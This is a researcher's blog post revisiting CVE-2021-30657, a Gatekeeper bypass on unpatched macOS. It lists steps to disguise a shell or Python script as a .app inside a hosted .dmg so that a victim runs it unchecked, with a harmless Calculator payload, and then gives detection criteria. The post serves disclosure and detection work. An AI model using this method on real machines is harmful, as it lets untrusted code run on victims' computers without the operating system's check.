CVE-2021–30657 Revisited

This is a quick follow-up to my previous blog where I discussed how I found the bug behind CVE-2021–30657 (link to previous blog, which also contains a link to Patrick Wardle’s deep dive into the bug itself: https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508). In this blog post I will share another very basic method that abuses this bug in unpatched versions of macOS (i.e., versions of Big Sur prior to 11.3 and Catalina 10.15.7 versions before Catalina Update 2021–002). Apple’s fix DOES prevent this method from working on patched versions of macOS. The Apple Security Advisory for macOS 11.3 can be found at: https://support.apple.com/en-us/HT212325. The Apple Security Advisory for Catalina Update 2021–002 can be found at: https://support.apple.com/en-us/HT212326

I wanted to share this additional simple Gatekeeper bypass method to help teams build detections/monitoring since it is possible that real world malware may have also at some point abused this simple GK bypass.

DETAILS

This simple GK bypass is slightly different from the previous bypass I shared and is actually even more simple. Steps below:

1. Create a simple shell script or python script:

Sample Bash Script:

#!/bin/bash
open -a Calculator.app

Sample Python Script:

#!/usr/bin/python
import os
os.system(“open -a Calculator.app”)

2. chmod +x [your script] and run it to make sure it works

3. rename the script to a .app filename:

% mv GKBypass.sh GKBypass.app

OR

% mv GKBypass.py GKBypass.app

4. create an empty directory and copy the .app file into that directory

5. create a .dmg from that directory (can use Disk Utility to do this pretty easily)

6. host the .dmg

7. on a target victim machine, download the .dmg

8. double click the .dmg

9. double click the .app file in side of the .dmg

10. Calculator will open (proof of the GK bypass)

In Summary, this is a simple bypass that just renames a python or shell script to .app, puts it in a dmg, and hosts it for a victim machine to download and run, and unpatched versions of macOS will execute this without Gatekeeper intervention.

DETECTION

===> process path: /bin/bash OR /bin/sh OR /bin/zsh OR /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python OR /usr/bin/python

===> arguments: contains “.app” but does not contain “/Contents/MacOS/”

===> parent pid: launchd (pid: 1)

Depending on your environment this search could turn up a large number of results of engineers who run scripts by changing the file extension to .app, but this search should be a good starting point.